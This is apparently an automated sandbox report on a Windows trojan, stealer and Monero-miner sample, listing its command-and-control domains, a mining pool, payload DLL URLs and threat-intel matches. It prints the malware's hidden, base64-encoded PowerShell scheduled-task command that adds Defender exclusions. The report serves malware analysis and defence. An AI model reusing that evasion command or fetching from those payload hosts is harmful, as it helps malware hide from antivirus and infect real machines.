https://aka.ms/pscore68	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
2x.si	172.67.143.156	true	false	16%, Virustotal, Browse	unknown
pool.hashvault.pro	142.202.242.43	true	true	7%, Virustotal, Browse	unknown
strompreis.ru	45.11.229.96	true	true	3%, Virustotal, Browse	unknown
eemmbryequo.shop	172.67.142.26	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
tryyudjasudqo.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
reggwardssdqw.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
licenseodqwmqn.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
relaxatinownio.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
keennylrwmqlw.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
tesecuuweqo.shop	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
tendencctywop.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://eemmbryequo.shop/api	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://2x.si/o3M.dll	true	Avira URL Cloud: safe	unknown
eemmbryequo.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.376013750933.0000022A40758000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375920946820.000001F52E761000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 0000000A.00000002.375954186503.0000021EAAA61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.378376086685.00000245CC611000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E3956000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-netJ	YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 0000000A.00000002.375975223417.0000021EBB07C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.378458637252.00000245DCC2C000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000012.00000002.376494366801.00000180F3E4C000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/wizard%s	RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000008.00000002.376013750933.0000022A40758000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000008.00000002.376013750933.0000022A40758000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://files.catbox.moe/kwfxr7.dll	RegSvcs.exe, 0000000C.00000002.378376086685.00000245CC742000.00000004.00000800.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg	glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlXz	powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/2152978/23354rCannot	glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/2152978/23354	YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.glo	RegSvcs.exe, 0000000C.00000002.378702032518.00000245E4E9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000008.00000002.376013750933.0000022A40758000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.376013750933.0000022A40758000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/docs/algorithms	RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/PesterXz	powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/benchmark/%s	RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000008.00000002.375952185699.0000022A306E1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://files.catbox.moe/k541xr.dll	RegSvcs.exe, 0000000C.00000002.378376086685.00000245CC742000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://2x.si/o3M.dllp	RegSvcs.exe, 0000000C.00000002.378376086685.00000245CC742000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375920946820.000001F52E93B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.375952185699.0000022A306E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.378376086685.00000245CC611000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.pngXz	powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.142.26	eemmbryequo.shop	United States	13335	CLOUDFLARENETUS	true
172.67.143.156	2x.si	United States	13335	CLOUDFLARENETUS	false
45.11.229.96	strompreis.ru	Germany	397525	ALPHAONE-ASUS	true
142.202.242.43	pool.hashvault.pro	Reserved	14315	1GSERVERSUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1513635
Start date and time:	2024-09-19 02:39:27 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	PT54FFSL7ET46RASB.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@41/21@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 72% Number of executed functions: 501 Number of non-executed functions: 32
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 20.190.152.22, 40.126.24.81, 40.126.24.148, 40.126.24.82, 40.126.24.149, 20.190.152.19, 40.126.24.147, 40.126.24.84, 104.208.16.94
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, nexusrules.officeapps.live.com, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
Execution Graph export aborted for target YZRVUYjilL.exe, PID 940 because it is empty
Execution Graph export aborted for target glmIOFfdMi.exe, PID 6648 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2320 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:41:34	Task Scheduler	Run new task: sjezcrijh path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==
02:41:35	Task Scheduler	Run new task: Current path: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
20:41:34	API Interceptor	1x Sleep call for process: YZRVUYjilL.exe modified
20:41:35	API Interceptor	16x Sleep call for process: powershell.exe modified
20:41:39	API Interceptor	7678567x Sleep call for process: glmIOFfdMi.exe modified
20:41:39	API Interceptor	6657345x Sleep call for process: RegSvcs.exe modified
20:42:03	API Interceptor	2x Sleep call for process: RegAsm.exe modified
20:42:11	API Interceptor	1x Sleep call for process: WerFault.exe modified
20:45:11	API Interceptor	1x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.142.26	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse
	l6E.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
172.67.143.156	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse
172.67.143.156	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse
45.11.229.96	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse
	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse
	4FwNHRnnXb.exe	Get hash	malicious	PureLog Stealer	Browse
142.202.242.43	System.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse
	08OyZEWGbf.exe	Get hash	malicious	Xmrig	Browse
	zTMEFv0Dh3.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	http://5.42.66.10/download/123p.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Trojan.Siggen27.52043.15111.6134.exe	Get hash	malicious	Xmrig	Browse
	VTbtz4ZUY6.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Trojan.Siggen27.16296.12545.31206.exe	Get hash	malicious	Xmrig	Browse
	gQZvXi6Osc.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse
	zLAr8hkDsu.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
2x.si	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	172.67.143.156
2x.si	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	172.67.143.156
eemmbryequo.shop	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	172.67.142.26
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	104.21.39.11
	l6E.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	file.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	log-analyzer.exe	Get hash	malicious	LummaC, MicroClip	Browse	104.21.39.11
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.142.26
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.39.11
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.142.26
	file.exe	Get hash	malicious	LummaC	Browse	104.21.39.11
pool.hashvault.pro	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	file.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	System.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse	142.202.242.45
	System.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	Update.exe	Get hash	malicious	Blank Grabber, Redline Clipper, Xmrig	Browse	45.76.89.70
	66dd2c2d3b88f_opera.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	04cde81ac938706771fa9fe936ee8f79fe7e079973098.exe	Get hash	malicious	RedLine, Xmrig	Browse	142.202.242.43
	file.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	3QKcKCEzYP.exe	Get hash	malicious	LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC	Browse	95.179.241.203
strompreis.ru	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	45.11.229.96
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	45.11.229.96
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	45.11.229.96
	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96
	4FwNHRnnXb.exe	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://bit.ly/2zH1V5k	Get hash	malicious	Unknown	Browse	104.22.51.245
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	172.67.142.26
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	172.67.143.156
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	104.21.39.11
	ESD99W89W99-PO9W2788Q-SHK092782.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://okcoin.83670.cyou/Index/index/Lang/it-it/Trade/tradelist	Get hash	malicious	Unknown	Browse	104.21.13.231
	http://jans-radical-site-16409d.webflow.io/	Get hash	malicious	Unknown	Browse	104.18.161.117
	http://terjal.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://sreypheasin.github.io/Netflix/	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
CLOUDFLARENETUS	https://bit.ly/2zH1V5k	Get hash	malicious	Unknown	Browse	104.22.51.245
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	172.67.142.26
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	172.67.143.156
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	104.21.39.11
	ESD99W89W99-PO9W2788Q-SHK092782.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://okcoin.83670.cyou/Index/index/Lang/it-it/Trade/tradelist	Get hash	malicious	Unknown	Browse	104.21.13.231
	http://jans-radical-site-16409d.webflow.io/	Get hash	malicious	Unknown	Browse	104.18.161.117
	http://terjal.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://sreypheasin.github.io/Netflix/	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
ALPHAONE-ASUS	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	45.11.229.96
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	45.11.229.96
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	45.11.229.96
	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96
	Aqua.mpsl-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	Aqua.arm7-20240804-2157.elf	Get hash	malicious	Mirai	Browse	45.13.227.24
	Aqua.mips-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	Aqua.x86_64-20240804-2157.elf	Get hash	malicious	Unknown	Browse	45.13.227.24
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	38.79.86.219
1GSERVERSUS	System.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse	142.202.242.43
	2BuZaUic3i.exe	Get hash	malicious	RedLine	Browse	207.32.219.79
	EpCrfIUgyF.exe	Get hash	malicious	RedLine	Browse	207.32.219.79
	04cde81ac938706771fa9fe936ee8f79fe7e079973098.exe	Get hash	malicious	RedLine, Xmrig	Browse	142.202.242.45
	Facturation.exe	Get hash	malicious	Doenerium	Browse	104.251.123.67
	SpelQ3Xvt7.exe	Get hash	malicious	AveMaria, UACMe	Browse	142.202.242.177
	http://khalidhost.loseyourip.com:777/dddd.mp4	Get hash	malicious	Unknown	Browse	207.32.217.25
	http://khalidhost.loseyourip.com:777/dddd.mp4	Get hash	malicious	Unknown	Browse	207.32.217.25
	arm4-20240706-0012.elf	Get hash	malicious	Mirai	Browse	207.32.216.16
	08OyZEWGbf.exe	Get hash	malicious	Xmrig	Browse	142.202.242.43

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	172.67.143.156
	http://santander-competencia.activaonline.cl/	Get hash	malicious	Unknown	Browse	172.67.143.156
	https://in-50card.ru/wr	Get hash	malicious	Unknown	Browse	172.67.143.156
	https://request-checksid-711843.pages.dev/robots.txt/	Get hash	malicious	Unknown	Browse	172.67.143.156
	http://caklwi392xqq.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.67.143.156
	https://iostart-trezori.github.io/	Get hash	malicious	Unknown	Browse	172.67.143.156
	https://piyush-ally9.github.io/Netflix-Clone	Get hash	malicious	HTMLPhisher	Browse	172.67.143.156
	https://aisthd.xyz/	Get hash	malicious	Unknown	Browse	172.67.143.156
	http://www.telegraxms.club/	Get hash	malicious	Telegram Phisher	Browse	172.67.143.156
a0e9f5d64349fb13191bc781f81f42e1	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	172.67.142.26
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	172.67.142.26
	http://gsx2-crm-apple-portal.com/go.php	Get hash	malicious	Unknown	Browse	172.67.142.26
	x64_stealth.dll.dll	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	172.67.142.26
	software.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	DLPAgent.msi	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	172.67.142.26
	l6E.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	file.exe	Get hash	malicious	LummaC	Browse	172.67.142.26
	file.exe	Get hash	malicious	SmokeLoader	Browse	172.67.142.26

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse
C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_4288f330dd69d220cd91c4da994b8eb932b2c82_85207d7d_92460402-3569-4cd0-877c-2429d52e9106\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.5958274433431956
Encrypted:	false
SSDEEP:	96:iMFDoeFy/FsQhMh6+fhvXIxcQ4c6fcE+cw3tZAXQ65FMTPS6PkpXmTAvnf/VxT5D:LJoeFy/F2mWbkQDu76BfAIO8b
MD5:	A4267D86A47F1CCA94BF1D4E69F71908
SHA1:	678D2CBAB408B5CBC7FC0D1517D09363851ABE06
SHA-256:	FD06FB27DDD53A5EC51D0A9F8369085E0382F64AD95C0A703311E486E518CF27
SHA-512:	5A9FF9594656876D4A34F90903D458A9613636DC571B8A90F794095A6666CE6E62A7C72A452756E3781C78CE413313A61D4C5F430DCF12C7C9A61B583AF5DD8F
Malicious:	false
